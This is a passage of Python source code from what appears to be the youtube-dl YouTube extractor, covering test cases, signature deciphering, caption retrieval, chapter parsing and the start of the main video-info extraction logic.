# Multifeed videos (multiple cameras), URL is for Main Camera
'url': 'https://www.youtube.com/watch?v=jqWvoWXjCVs',
'info_dict': {
'id': 'jqWvoWXjCVs',
'title': 'teamPGP: Rocket League Noob Stream',
'description': 'md5:dc7872fb300e143831327f1bae3af010',
},
'playlist': [{
'info_dict': {
'id': 'jqWvoWXjCVs',
'ext': 'mp4',
'title': 'teamPGP: Rocket League Noob Stream (Main Camera)',
'description': 'md5:dc7872fb300e143831327f1bae3af010',
'duration': 7335,
'upload_date': '20150721',
'uploader': 'Beer Games Beer',
'uploader_id': 'beergamesbeer',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/beergamesbeer',
'license': 'Standard YouTube License',
},
}, {
'info_dict': {
'id': '6h8e8xoXJzg',
'ext': 'mp4',
'title': 'teamPGP: Rocket League Noob Stream (kreestuh)',
'description': 'md5:dc7872fb300e143831327f1bae3af010',
'duration': 7337,
'upload_date': '20150721',
'uploader': 'Beer Games Beer',
'uploader_id': 'beergamesbeer',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/beergamesbeer',
'license': 'Standard YouTube License',
},
}, {
'info_dict': {
'id': 'PUOgX5z9xZw',
'ext': 'mp4',
'title': 'teamPGP: Rocket League Noob Stream (grizzle)',
'description': 'md5:dc7872fb300e143831327f1bae3af010',
'duration': 7337,
'upload_date': '20150721',
'uploader': 'Beer Games Beer',
'uploader_id': 'beergamesbeer',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/beergamesbeer',
'license': 'Standard YouTube License',
},
}, {
'info_dict': {
'id': 'teuwxikvS5k',
'ext': 'mp4',
'title': 'teamPGP: Rocket League Noob Stream (zim)',
'description': 'md5:dc7872fb300e143831327f1bae3af010',
'duration': 7334,
'upload_date': '20150721',
'uploader': 'Beer Games Beer',
'uploader_id': 'beergamesbeer',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/beergamesbeer',
'license': 'Standard YouTube License',
},
}],
'params': {
'skip_download': True,
},
},
{
# Multifeed video with comma in title (see https://github.com/rg3/youtube-dl/issues/8536)
'url': 'https://www.youtube.com/watch?v=gVfLd0zydlo',
'info_dict': {
'id': 'gVfLd0zydlo',
'title': 'DevConf.cz 2016 Day 2 Workshops 1 14:00 - 15:30',
},
'playlist_count': 2,
'skip': 'Not multifeed anymore',
},
{
'url': 'https://vid.plus/FlRa-iH7PGw',
'only_matching': True,
},
{
'url': 'https://zwearz.com/watch/9lWxNJF-ufM/electra-woman-dyna-girl-official-trailer-grace-helbig.html',
'only_matching': True,
},
{
# Title with JS-like syntax "};" (see https://github.com/rg3/youtube-dl/issues/7468)
# Also tests cut-off URL expansion in video description (see
# https://github.com/rg3/youtube-dl/issues/1892,
# https://github.com/rg3/youtube-dl/issues/8164)
'url': 'https://www.youtube.com/watch?v=lsguqyKfVQg',
'info_dict': {
'id': 'lsguqyKfVQg',
'ext': 'mp4',
'title': '{dark walk}; Loki/AC/Dishonored; collab w/Elflover21',
'alt_title': 'Dark Walk - Position Music',
'description': 'md5:8085699c11dc3f597ce0410b0dcbb34a',
'duration': 133,
'upload_date': '20151119',
'uploader_id': 'IronSoulElf',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/IronSoulElf',
'uploader': 'IronSoulElf',
'license': 'Standard YouTube License',
'creator': 'Todd Haberman, Daniel Law Heath and Aaron Kaplan',
'track': 'Dark Walk - Position Music',
'artist': 'Todd Haberman, Daniel Law Heath and Aaron Kaplan',
},
'params': {
'skip_download': True,
},
},
{
# Tags with '};' (see https://github.com/rg3/youtube-dl/issues/7468)
'url': 'https://www.youtube.com/watch?v=Ms7iBXnlUO8',
'only_matching': True,
},
{
# Video with yt:stretch=17:0
'url': 'https://www.youtube.com/watch?v=Q39EVAstoRM',
'info_dict': {
'id': 'Q39EVAstoRM',
'ext': 'mp4',
'title': 'Clash Of Clans#14 Dicas De Ataque Para CV 4',
'description': 'md5:ee18a25c350637c8faff806845bddee9',
'upload_date': '20151107',
'uploader_id': 'UCCr7TALkRbo3EtFzETQF1LA',
'uploader': 'CH GAMER DROID',
},
'params': {
'skip_download': True,
},
'skip': 'This video does not exist.',
},
{
# Video licensed under Creative Commons
'url': 'https://www.youtube.com/watch?v=M4gD1WSo5mA',
'info_dict': {
'id': 'M4gD1WSo5mA',
'ext': 'mp4',
'title': 'md5:e41008789470fc2533a3252216f1c1d1',
'description': 'md5:a677553cf0840649b731a3024aeff4cc',
'duration': 721,
'upload_date': '20150127',
'uploader_id': 'BerkmanCenter',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/BerkmanCenter',
'uploader': 'The Berkman Klein Center for Internet & Society',
'license': 'Creative Commons Attribution license (reuse allowed)',
},
'params': {
'skip_download': True,
},
},
{
# Channel-like uploader_url
'url': 'https://www.youtube.com/watch?v=eQcmzGIKrzg',
'info_dict': {
'id': 'eQcmzGIKrzg',
'ext': 'mp4',
'title': 'Democratic Socialism and Foreign Policy | Bernie Sanders',
'description': 'md5:dda0d780d5a6e120758d1711d062a867',
'duration': 4060,
'upload_date': '20151119',
'uploader': 'Bernie Sanders',
'uploader_id': 'UCH1dpzjCEiGAt8CXkryhkZg',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/channel/UCH1dpzjCEiGAt8CXkryhkZg',
'license': 'Creative Commons Attribution license (reuse allowed)',
},
'params': {
'skip_download': True,
},
},
{
'url': 'https://www.youtube.com/watch?feature=player_embedded&amp;v=V36LpHqtcDY',
'only_matching': True,
},
{
# YouTube Red paid video (https://github.com/rg3/youtube-dl/issues/10059)
'url': 'https://www.youtube.com/watch?v=i1Ko8UG-Tdo',
'only_matching': True,
},
{
# Rental video preview
'url': 'https://www.youtube.com/watch?v=yYr8q0y5Jfg',
'info_dict': {
'id': 'uGpuVWrhIzE',
'ext': 'mp4',
'title': 'Piku - Trailer',
'description': 'md5:c36bd60c3fd6f1954086c083c72092eb',
'upload_date': '20150811',
'uploader': 'FlixMatrix',
'uploader_id': 'FlixMatrixKaravan',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/FlixMatrixKaravan',
'license': 'Standard YouTube License',
},
'params': {
'skip_download': True,
},
'skip': 'This video is not available.',
},
{
# YouTube Red video with episode data
'url': 'https://www.youtube.com/watch?v=iqKdEhx-dD4',
'info_dict': {
'id': 'iqKdEhx-dD4',
'ext': 'mp4',
'title': 'Isolation - Mind Field (Ep 1)',
'description': 'md5:25b78d2f64ae81719f5c96319889b736',
'duration': 2085,
'upload_date': '20170118',
'uploader': 'Vsauce',
'uploader_id': 'Vsauce',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/user/Vsauce',
'license': 'Standard YouTube License',
'series': 'Mind Field',
'season_number': 1,
'episode_number': 1,
},
'params': {
'skip_download': True,
},
'expected_warnings': [
'Skipping DASH manifest',
],
},
{
# The following content has been identified by the YouTube community
# as inappropriate or offensive to some audiences.
'url': 'https://www.youtube.com/watch?v=6SJNVb0GnPI',
'info_dict': {
'id': '6SJNVb0GnPI',
'ext': 'mp4',
'title': 'Race Differences in Intelligence',
'description': 'md5:5d161533167390427a1f8ee89a1fc6f1',
'duration': 965,
'upload_date': '20140124',
'uploader': 'New Century Foundation',
'uploader_id': 'UCEJYpZGqgUob0zVVEaLhvVg',
'uploader_url': r're:https?://(?:www\.)?youtube\.com/channel/UCEJYpZGqgUob0zVVEaLhvVg',
'license': 'Standard YouTube License',
},
'params': {
'skip_download': True,
},
},
{
# itag 212
'url': '1t24XAntNCY',
'only_matching': True,
},
{
# geo restricted to JP
'url': 'sJL6WA-aGkQ',
'only_matching': True,
},
{
'url': 'https://www.youtube.com/watch?v=MuAGGZNfUkU&list=RDMM',
'only_matching': True,
},
]
def __init__(self, *args, **kwargs):
super(YoutubeIE, self).__init__(*args, **kwargs)
self._player_cache = {}
def report_video_info_webpage_download(self, video_id):
"""Report attempt to download video info webpage."""
self.to_screen('%s: Downloading video info webpage' % video_id)
def report_information_extraction(self, video_id):
"""Report attempt to extract video information."""
self.to_screen('%s: Extracting video information' % video_id)
def report_unavailable_format(self, video_id, format):
"""Report extracted video URL."""
self.to_screen('%s: Format %s not available' % (video_id, format))
def report_rtmp_download(self):
"""Indicate the download will use the RTMP protocol."""
self.to_screen('RTMP download detected')
def _signature_cache_id(self, example_sig):
""" Return a string representation of a signature """
return '.'.join(compat_str(len(part)) for part in example_sig.split('.'))
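    # For example (the signature value is hypothetical), a scrambled signature
    # such as 'ABCDE.FGH.IJKLMNOP' yields the cache id '5.3.8' -- only the
    # lengths of the dot-separated parts matter for identifying the
    # scrambling pattern.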
def _extract_signature_function(self, video_id, player_url, example_sig):
id_m = re.match(
r'.*?-(?P<id>[a-zA-Z0-9_-]+)(?:/watch_as3|/html5player(?:-new)?|(?:/[a-z]{2}_[A-Z]{2})?/base)?\.(?P<ext>[a-z]+)$',
player_url)
if not id_m:
raise ExtractorError('Cannot identify player %r' % player_url)
player_type = id_m.group('ext')
player_id = id_m.group('id')
# Read from filesystem cache
func_id = '%s_%s_%s' % (
player_type, player_id, self._signature_cache_id(example_sig))
assert os.path.basename(func_id) == func_id
cache_spec = self._downloader.cache.load('youtube-sigfuncs', func_id)
if cache_spec is not None:
return lambda s: ''.join(s[i] for i in cache_spec)
download_note = (
'Downloading player %s' % player_url
if self._downloader.params.get('verbose') else
'Downloading %s player %s' % (player_type, player_id)
)
if player_type == 'js':
code = self._download_webpage(
player_url, video_id,
note=download_note,
errnote='Download of %s failed' % player_url)
res = self._parse_sig_js(code)
elif player_type == 'swf':
urlh = self._request_webpage(
player_url, video_id,
note=download_note,
errnote='Download of %s failed' % player_url)
code = urlh.read()
res = self._parse_sig_swf(code)
else:
assert False, 'Invalid player type %r' % player_type
test_string = ''.join(map(compat_chr, range(len(example_sig))))
cache_res = res(test_string)
cache_spec = [ord(c) for c in cache_res]
self._downloader.cache.store('youtube-sigfuncs', func_id, cache_spec)
return res
def _print_sig_code(self, func, example_sig):
def gen_sig_code(idxs):
def _genslice(start, end, step):
starts = '' if start == 0 else str(start)
ends = (':%d' % (end + step)) if end + step >= 0 else ':'
steps = '' if step == 1 else (':%d' % step)
return 's[%s%s%s]' % (starts, ends, steps)
step = None
# Quelch pyflakes warnings - start will be set when step is set
start = '(Never used)'
for i, prev in zip(idxs[1:], idxs[:-1]):
if step is not None:
if i - prev == step:
continue
yield _genslice(start, prev, step)
step = None
continue
if i - prev in [-1, 1]:
step = i - prev
start = prev
continue
else:
yield 's[%d]' % prev
if step is None:
yield 's[%d]' % i
else:
yield _genslice(start, i, step)
test_string = ''.join(map(compat_chr, range(len(example_sig))))
cache_res = func(test_string)
cache_spec = [ord(c) for c in cache_res]
expr_code = ' + '.join(gen_sig_code(cache_spec))
signature_id_tuple = '(%s)' % (
', '.join(compat_str(len(p)) for p in example_sig.split('.')))
code = ('if tuple(len(p) for p in s.split(\'.\')) == %s:\n'
' return %s\n') % (signature_id_tuple, expr_code)
self.to_screen('Extracted signature function:\n' + code)
def _parse_sig_js(self, jscode):
funcname = self._search_regex(
(r'(["\'])signature\1\s*,\s*(?P<sig>[a-zA-Z0-9$]+)\(',
r'\.sig\|\|(?P<sig>[a-zA-Z0-9$]+)\(',
r'yt\.akamaized\.net/\)\s*\|\|\s*.*?\s*c\s*&&\s*d\.set\([^,]+\s*,\s*(?P<sig>[a-zA-Z0-9$]+)\(',
r'\bc\s*&&\s*d\.set\([^,]+\s*,\s*(?P<sig>[a-zA-Z0-9$]+)\('),
jscode, 'Initial JS player signature function name', group='sig')
jsi = JSInterpreter(jscode)
initial_function = jsi.extract_function(funcname)
return lambda s: initial_function([s])
def _parse_sig_swf(self, file_contents):
swfi = SWFInterpreter(file_contents)
TARGET_CLASSNAME = 'SignatureDecipher'
searched_class = swfi.extract_class(TARGET_CLASSNAME)
initial_function = swfi.extract_function(searched_class, 'decipher')
return lambda s: initial_function([s])
def _decrypt_signature(self, s, video_id, player_url, age_gate=False):
"""Turn the encrypted s field into a working signature"""
if player_url is None:
raise ExtractorError('Cannot decrypt signature without player_url')
if player_url.startswith('//'):
player_url = 'https:' + player_url
elif not re.match(r'https?://', player_url):
player_url = compat_urlparse.urljoin(
'https://www.youtube.com', player_url)
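        # Deciphering functions are cached per (player URL, signature layout),
        # so each player is downloaded and parsed at most once per layout.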
try:
player_id = (player_url, self._signature_cache_id(s))
if player_id not in self._player_cache:
func = self._extract_signature_function(
video_id, player_url, s
)
self._player_cache[player_id] = func
func = self._player_cache[player_id]
if self._downloader.params.get('youtube_print_sig_code'):
self._print_sig_code(func, s)
return func(s)
except Exception as e:
tb = traceback.format_exc()
raise ExtractorError(
'Signature extraction failed: ' + tb, cause=e)
def _get_subtitles(self, video_id, webpage):
try:
subs_doc = self._download_xml(
'https://video.google.com/timedtext?hl=en&type=list&v=%s' % video_id,
video_id, note=False)
except ExtractorError as err:
self._downloader.report_warning('unable to download video subtitles: %s' % error_to_compat_str(err))
return {}
sub_lang_list = {}
for track in subs_doc.findall('track'):
lang = track.attrib['lang_code']
if lang in sub_lang_list:
continue
sub_formats = []
for ext in self._SUBTITLE_FORMATS:
params = compat_urllib_parse_urlencode({
'lang': lang,
'v': video_id,
'fmt': ext,
'name': track.attrib['name'].encode('utf-8'),
})
sub_formats.append({
'url': 'https://www.youtube.com/api/timedtext?' + params,
'ext': ext,
})
sub_lang_list[lang] = sub_formats
if not sub_lang_list:
self._downloader.report_warning('video doesn\'t have subtitles')
return {}
return sub_lang_list
def _get_ytplayer_config(self, video_id, webpage):
patterns = (
            # User data may contain arbitrary character sequences that may affect
            # JSON extraction with regex, e.g. when '};' is contained the second
            # regex won't capture the whole JSON. Work around this by trying the
            # more specific regex first; proper quoted-string handling, to be
            # implemented in the future, will replace this workaround (see
            # https://github.com/rg3/youtube-dl/issues/7468,
            # https://github.com/rg3/youtube-dl/pull/7599)
r';ytplayer\.config\s*=\s*({.+?});ytplayer',
r';ytplayer\.config\s*=\s*({.+?});',
)
config = self._search_regex(
patterns, webpage, 'ytplayer.config', default=None)
if config:
return self._parse_json(
uppercase_escape(config), video_id, fatal=False)
def _get_automatic_captions(self, video_id, webpage):
"""We need the webpage for getting the captions url, pass it as an
argument to speed up the process."""
self.to_screen('%s: Looking for automatic captions' % video_id)
player_config = self._get_ytplayer_config(video_id, webpage)
err_msg = 'Couldn\'t find automatic captions for %s' % video_id
if not player_config:
self._downloader.report_warning(err_msg)
return {}
try:
args = player_config['args']
caption_url = args.get('ttsurl')
if caption_url:
timestamp = args['timestamp']
# We get the available subtitles
list_params = compat_urllib_parse_urlencode({
'type': 'list',
'tlangs': 1,
'asrs': 1,
})
list_url = caption_url + '&' + list_params
caption_list = self._download_xml(list_url, video_id)
original_lang_node = caption_list.find('track')
if original_lang_node is None:
self._downloader.report_warning('Video doesn\'t have automatic captions')
return {}
original_lang = original_lang_node.attrib['lang_code']
caption_kind = original_lang_node.attrib.get('kind', '')
sub_lang_list = {}
for lang_node in caption_list.findall('target'):
sub_lang = lang_node.attrib['lang_code']
sub_formats = []
for ext in self._SUBTITLE_FORMATS:
params = compat_urllib_parse_urlencode({
'lang': original_lang,
'tlang': sub_lang,
'fmt': ext,
'ts': timestamp,
'kind': caption_kind,
})
sub_formats.append({
'url': caption_url + '&' + params,
'ext': ext,
})
sub_lang_list[sub_lang] = sub_formats
return sub_lang_list
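            # Build the per-language subtitle format list by rewriting the base
            # caption URL with each target language and extension.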
def make_captions(sub_url, sub_langs):
parsed_sub_url = compat_urllib_parse_urlparse(sub_url)
caption_qs = compat_parse_qs(parsed_sub_url.query)
captions = {}
for sub_lang in sub_langs:
sub_formats = []
for ext in self._SUBTITLE_FORMATS:
caption_qs.update({
'tlang': [sub_lang],
'fmt': [ext],
})
sub_url = compat_urlparse.urlunparse(parsed_sub_url._replace(
query=compat_urllib_parse_urlencode(caption_qs, True)))
sub_formats.append({
'url': sub_url,
'ext': ext,
})
captions[sub_lang] = sub_formats
return captions
# New captions format as of 22.06.2017
player_response = args.get('player_response')
if player_response and isinstance(player_response, compat_str):
player_response = self._parse_json(
player_response, video_id, fatal=False)
if player_response:
renderer = player_response['captions']['playerCaptionsTracklistRenderer']
base_url = renderer['captionTracks'][0]['baseUrl']
sub_lang_list = []
for lang in renderer['translationLanguages']:
lang_code = lang.get('languageCode')
if lang_code:
sub_lang_list.append(lang_code)
return make_captions(base_url, sub_lang_list)
# Some videos don't provide ttsurl but rather caption_tracks and
# caption_translation_languages (e.g. 20LmZk1hakA)
            # Not used anymore as of 22.06.2017
caption_tracks = args['caption_tracks']
caption_translation_languages = args['caption_translation_languages']
caption_url = compat_parse_qs(caption_tracks.split(',')[0])['u'][0]
sub_lang_list = []
for lang in caption_translation_languages.split(','):
lang_qs = compat_parse_qs(compat_urllib_parse_unquote_plus(lang))
sub_lang = lang_qs.get('lc', [None])[0]
if sub_lang:
sub_lang_list.append(sub_lang)
return make_captions(caption_url, sub_lang_list)
        # An extractor error can be raised by the download process if there are
        # no automatic captions but there are subtitles
except (KeyError, IndexError, ExtractorError):
self._downloader.report_warning(err_msg)
return {}
def _mark_watched(self, video_id, video_info):
playback_url = video_info.get('videostats_playback_base_url', [None])[0]
if not playback_url:
return
parsed_playback_url = compat_urlparse.urlparse(playback_url)
qs = compat_urlparse.parse_qs(parsed_playback_url.query)
# cpn generation algorithm is reverse engineered from base.js.
# In fact it works even with dummy cpn.
CPN_ALPHABET = 'abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789-_'
cpn = ''.join((CPN_ALPHABET[random.randint(0, 256) & 63] for _ in range(0, 16)))
qs.update({
'ver': ['2'],
'cpn': [cpn],
})
playback_url = compat_urlparse.urlunparse(
parsed_playback_url._replace(query=compat_urllib_parse_urlencode(qs, True)))
self._download_webpage(
playback_url, video_id, 'Marking watched',
'Unable to mark watched', fatal=False)
@staticmethod
def _extract_urls(webpage):
# Embedded YouTube player
entries = [
unescapeHTML(mobj.group('url'))
for mobj in re.finditer(r'''(?x)
(?:
<iframe[^>]+?src=|
data-video-url=|
<embed[^>]+?src=|
embedSWF\(?:\s*|
<object[^>]+data=|
new\s+SWFObject\(
)
(["\'])
(?P<url>(?:https?:)?//(?:www\.)?youtube(?:-nocookie)?\.com/
(?:embed|v|p)/[0-9A-Za-z_-]{11}.*?)
\1''', webpage)]
# lazyYT YouTube embed
entries.extend(list(map(
unescapeHTML,
re.findall(r'class="lazyYT" data-youtube-id="([^"]+)"', webpage))))
# Wordpress "YouTube Video Importer" plugin
matches = re.findall(r'''(?x)<div[^>]+
class=(?P<q1>[\'"])[^\'"]*\byvii_single_video_player\b[^\'"]*(?P=q1)[^>]+
data-video_id=(?P<q2>[\'"])([^\'"]+)(?P=q2)''', webpage)
entries.extend(m[-1] for m in matches)
return entries
@staticmethod
def _extract_url(webpage):
urls = YoutubeIE._extract_urls(webpage)
return urls[0] if urls else None
@classmethod
def extract_id(cls, url):
mobj = re.match(cls._VALID_URL, url, re.VERBOSE)
if mobj is None:
raise ExtractorError('Invalid URL: %s' % url)
video_id = mobj.group(2)
return video_id
def _extract_annotations(self, video_id):
url = 'https://www.youtube.com/annotations_invideo?features=1&legacy=1&video_id=%s' % video_id
return self._download_webpage(url, video_id, note='Searching for annotations.', errnote='Unable to download video annotations.')
@staticmethod
def _extract_chapters(description, duration):
if not description:
return None
chapter_lines = re.findall(
r'(?:^|<br\s*/>)([^<]*<a[^>]+onclick=["\']yt\.www\.watch\.player\.seekTo[^>]+>(\d{1,2}:\d{1,2}(?::\d{1,2})?)</a>[^>]*)(?=$|<br\s*/>)',
description)
if not chapter_lines:
return None
chapters = []
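        # Each matched line carries a seekTo timestamp; it starts a chapter and
        # the next timestamp (or the video duration) ends it.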
for next_num, (chapter_line, time_point) in enumerate(
chapter_lines, start=1):
start_time = parse_duration(time_point)
if start_time is None:
continue
if start_time > duration:
break
end_time = (duration if next_num == len(chapter_lines)
else parse_duration(chapter_lines[next_num][1]))
if end_time is None:
continue
if end_time > duration:
end_time = duration
if start_time > end_time:
break
chapter_title = re.sub(
r'<a[^>]+>[^<]+</a>', '', chapter_line).strip(' \t-')
chapter_title = re.sub(r'\s+', ' ', chapter_title)
chapters.append({
'start_time': start_time,
'end_time': end_time,
'title': chapter_title,
})
return chapters
def _real_extract(self, url):
url, smuggled_data = unsmuggle_url(url, {})
proto = (
'http' if self._downloader.params.get('prefer_insecure', False)
else 'https')
start_time = None
end_time = None
parsed_url = compat_urllib_parse_urlparse(url)
for component in [parsed_url.fragment, parsed_url.query]:
query = compat_parse_qs(component)
if start_time is None and 't' in query:
start_time = parse_duration(query['t'][0])
if start_time is None and 'start' in query:
start_time = parse_duration(query['start'][0])
if end_time is None and 'end' in query:
end_time = parse_duration(query['end'][0])
# Extract original video URL from URL with redirection, like age verification, using next_url parameter
mobj = re.search(self._NEXT_URL_RE, url)
if mobj:
url = proto + '://www.youtube.com/' + compat_urllib_parse_unquote(mobj.group(1)).lstrip('/')
video_id = self.extract_id(url)
# Get video webpage
url = proto + '://www.youtube.com/watch?v=%s&gl=US&hl=en&has_verified=1&bpctr=9999999999' % video_id
video_webpage = self._download_webpage(url, video_id)
# Attempt to extract SWF player URL
mobj = re.search(r'swfConfig.*?"(https?:\\/\\/.*?watch.*?-.*?\.swf)"', video_webpage)
if mobj is not None:
player_url = re.sub(r'\\(.)', r'\1', mobj.group(1))
else:
player_url = None
dash_mpds = []
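        # Collect every distinct DASH manifest URL found in the webpage config
        # and in the get_video_info responses.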
def add_dash_mpd(video_info):
dash_mpd = video_info.get('dashmpd')
if dash_mpd and dash_mpd[0] not in dash_mpds:
dash_mpds.append(dash_mpd[0])
is_live = None
view_count = None
def extract_view_count(v_info):
return int_or_none(try_get(v_info, lambda x: x['view_count'][0]))
# Get video info
embed_webpage = None
if re.search(r'player-age-gate-content">', video_webpage) is not None:
age_gate = True
# We simulate the access to the video from www.youtube.com/v/{video_id}
# this can be viewed without login into Youtube
url = proto + '://www.youtube.com/embed/%s' % video_id
embed_webpage = self._download_webpage(url, video_id, 'Downloading embed webpage')
data = compat_urllib_parse_urlencode({
'video_id': video_id,
'eurl': 'https://youtube.googleapis.com/v/' + video_id,
'sts': self._search_regex(
r'"sts"\s*:\s*(\d+)', embed_webpage, 'sts', default=''),
})
video_info_url = proto + '://www.youtube.com/get_video_info?' + data
video_info_webpage = self._download_webpage(
video_info_url, video_id,
note='Refetching age-gated info webpage',
errnote='unable to download video info webpage')
video_info = compat_parse_qs(video_info_webpage)
add_dash_mpd(video_info)
else:
age_gate = False
video_info = None
sts = None
# Try looking directly into the video webpage
ytplayer_config = self._get_ytplayer_config(video_id, video_webpage)
if ytplayer_config:
args = ytplayer_config['args']
if args.get('url_encoded_fmt_stream_map') or args.get('hlsvp'):
# Convert to the same format returned by compat_parse_qs
video_info = dict((k, [v]) for k, v in args.items())
add_dash_mpd(video_info)
# Rental video is not rented but preview is available (e.g.
# https://www.youtube.com/watch?v=yYr8q0y5Jfg,
# https://github.com/rg3/youtube-dl/issues/10532)
if not video_info and args.get('ypc_vid'):
return self.url_result(
args['ypc_vid'], YoutubeIE.ie_key(), video_id=args['ypc_vid'])
if args.get('livestream') == '1' or args.get('live_playback') == 1:
is_live = True
sts = ytplayer_config.get('sts')
if not video_info or self._downloader.params.get('youtube_include_dash_manifest', True):
# We also try looking in get_video_info since it may contain different dashmpd
# URL that points to a DASH manifest with possibly different itag set (some itags
# are missing from DASH manifest pointed by webpage's dashmpd, some - from DASH
# manifest pointed by get_video_info's dashmpd).
# The general idea is to take a union of itags of both DASH manifests (for example
# video with such 'manifest behavior' see https://github.com/rg3/youtube-dl/issues/6093)
self.report_video_info_webpage_download(video_id)
for el in ('info', 'embedded', 'detailpage', 'vevo', ''):
query = {
'video_id': video_id,
'ps': 'default',
'eurl': '',
'gl': 'US',
'hl': 'en',
}
if el:
query['el'] = el
if sts:
query['sts'] = sts
video_info_webpage = self._download_webpage(
'%s://www.youtube.com/get_video_info' % proto,
video_id, note=False,
errnote='unable to download video info webpage',
fatal=False, query=query)
if not video_info_webpage:
continue
get_video_info = compat_parse_qs(video_info_webpage)
add_dash_mpd(get_video_info)
if view_count is None:
view_count = extract_view_count(get_video_info)
if not video_info:
video_info = get_video_info
if 'token' in get_video_info:
# Different get_video_info requests may report different results, e.g.
# some may report video unavailability, but some may serve it without
# any complaint (see https://github.com/rg3/youtube-dl/issues/7362,
# the original webpage as well as el=info and el=embedded get_video_info
# requests report video unavailability due to geo restriction while
# el=detailpage succeeds and returns valid data). This is probably
# due to YouTube measures against IP ranges of hosting providers.
                    # Work around this by preferring the first successful video_info
                    # containing the token if no such video_info has been found yet.
if 'token' not in video_info:
video_info = get_video_info
break
def extract_unavailable_message():
return self._html_search_regex(
r'(?s)<h1[^>]+id="unavailable-message"[^>]*>(.+?)</h1>',
video_webpage, 'unavailable message', default=None)
if 'token' not in video_info:
if 'reason' in video_info:
if 'The uploader has not made this video available in your country.' in video_info['reason']:
regions_allowed = self._html_search_meta(
'regionsAllowed', video_webpage, default=None)
countries = regions_allowed.split(',') if regions_allowed else None
self.raise_geo_restricted(
msg=video_info['reason'][0], countries=countries)
reason = video_info['reason'][0]
if 'Invalid parameters' in reason:
unavailable_message = extract_unavailable_message()
if unavailable_message:
reason = unavailable_message
raise ExtractorError(
'YouTube said: %s' % reason,
expected=True, video_id=video_id)
else:
raise ExtractorError(
'"token" parameter not in video info for unknown reason',
video_id=video_id)
# title
if 'title' in video_info:
video_title = video_info['title'][0]
else:
self._downloader.report_warning('Unable to extract video title')
video_title = '_'
# description
description_original = video_description = get_element_by_id("eow-description", video_webpage)
if video_description:
def replace_url(m):
redir_url = compat_urlparse.urljoin(url, m.group(1))
parsed_redir_url = compat_urllib_parse_urlparse(redir_url)
if re.search(r'^(?:www\.)?(?:youtube(?:-nocookie)?\.com|youtu\.be)$', parsed_redir_url.netloc) and parsed_redir_url.path == '/redirect':
qs = compat_parse_qs(parsed_redir_url.query)
q = qs.get('q')
if q and q[0]:
return q[0]
return redir_url
description_original = video_description = re.sub(r'''(?x)
<a\s+
(?:[a-zA-Z-]+="[^"]*"\s+)*?
(?:title|href)="([^"]+)"\s+
(?:[a-zA-Z-]+="[^"]*"\s+)*?
class="[^"]*"[^>]*>
[^<]+\.{3}\s*
</a>
''', replace_url, video_description)
video_description = clean_html(video_description)
else:
fd_mobj = re.search(r'<meta name="description" content="([^"]+)"', video_webpage)
if fd_mobj:
video_description = unescapeHTML(fd_mobj.group(1))
else:
video_description = ''
if 'multifeed_metadata_list' in video_info and not smuggled_data.get('force_singlefeed', False):
if not self._downloader.params.get('noplaylist'):
entries = []
feed_ids = []
multifeed_metadata_list = video_info['multifeed_metadata_list'][0]
for feed in multifeed_metadata_list.split(','):
# Unquote should take place before split on comma (,) since textual
# fields may contain comma as well (see
# https://github.com/rg3/youtube-dl/issues/8536)
feed_data = compat_parse_qs(compat_urllib_parse_unquote_plus(feed))
entries.append({
'_type': 'url_transparent',
'ie_key': 'Youtube',
'url': smuggle_url(
'%s://www.youtube.com/watch?v=%s' % (proto, feed_data['id'][0]),
{'force_singlefeed': True}),
'title': '%s (%s)' % (video_title, feed_data['title'][0]),
})
feed_ids.append(feed_data['id'][0])
self.to_screen(
'Downloading multifeed video (%s) - add --no-playlist to just download video %s'
% (', '.join(feed_ids), video_id))
return self.playlist_result(entries, video_id, video_title, video_description)
self.to_screen('Downloading just video %s because of --no-playlist' % video_id)
if view_count is None:
view_count = extract_view_count(video_info)
# Check for "rental" videos
if 'ypc_video_rental_bar_text' in video_info and 'author' not in video_info:
raise ExtractorError('"rental" videos not supported. See https://github.com/rg3/youtube-dl/issues/359 for more information.', expected=True)
def _extract_filesize(media_url):
return int_or_none(self._search_regex(
r'\bclen[=/](\d+)', media_url, 'filesize', default=None))
if 'conn' in video_info and video_info['conn'][0].startswith('rtmp'):
self.report_rtmp_download()
formats = [{
'format_id': '_rtmp',
'protocol': 'rtmp',
'url': video_info['conn'][0],
'player_url': player_url,
}]
elif not is_live and (len(video_info.get('url_encoded_fmt_stream_map', [''])[0]) >= 1 or len(video_info.get('adaptive_fmts', [''])[0]) >= 1):
encoded_url_map = video_info.get('url_encoded_fmt_stream_map', [''])[0] + ',' + video_info.get('adaptive_fmts', [''])[0]
if 'rtmpe%3Dyes' in encoded_url_map:
raise ExtractorError('rtmpe downloads are not supported, see https://github.com/rg3/youtube-dl/issues/343 for more information.', expected=True)
formats_spec = {}
fmt_list = video_info.get('fmt_list', [''])[0]
if fmt_list:
for fmt in fmt_list.split(','):
spec = fmt.split('/')
if len(spec) > 1:
width_height = spec[1].split('x')
if len(width_height) == 2:
formats_spec[spec[0]] = {
'resolution': spec[1],
'width': int_or_none(width_height[0]),
'height': int_or_none(width_height[1]),
}
q = qualities(['small', 'medium', 'hd720'])
formats = []
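            # Each comma-separated entry is a URL-encoded dict with at least an
            # itag and a url; an 's' field holds an encrypted signature that must
            # be deciphered with the JS/SWF player before the URL is usable.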
for url_data_str in encoded_url_map.split(','):
url_data = compat_parse_qs(url_data_str)
if 'itag' not in url_data or 'url' not in url_data:
continue
format_id = url_data['itag'][0]
url = url_data['url'][0]
if 's' in url_data or self._downloader.params.get('youtube_include_dash_manifest', True):
ASSETS_RE = r'"assets":.+?"js":\s*("[^"]+")'
jsplayer_url_json = self._search_regex(
ASSETS_RE,
embed_webpage if age_gate else video_webpage,
'JS player URL (1)', default=None)
if not jsplayer_url_json and not age_gate:
# We need the embed website after all
if embed_webpage is None:
embed_url = proto + '://www.youtube.com/embed/%s' % video_id
embed_webpage = self._download_webpage(
embed_url, video_id, 'Downloading embed webpage')
jsplayer_url_json = self._search_regex(
ASSETS_RE, embed_webpage, 'JS player URL')
player_url = json.loads(jsplayer_url_json)
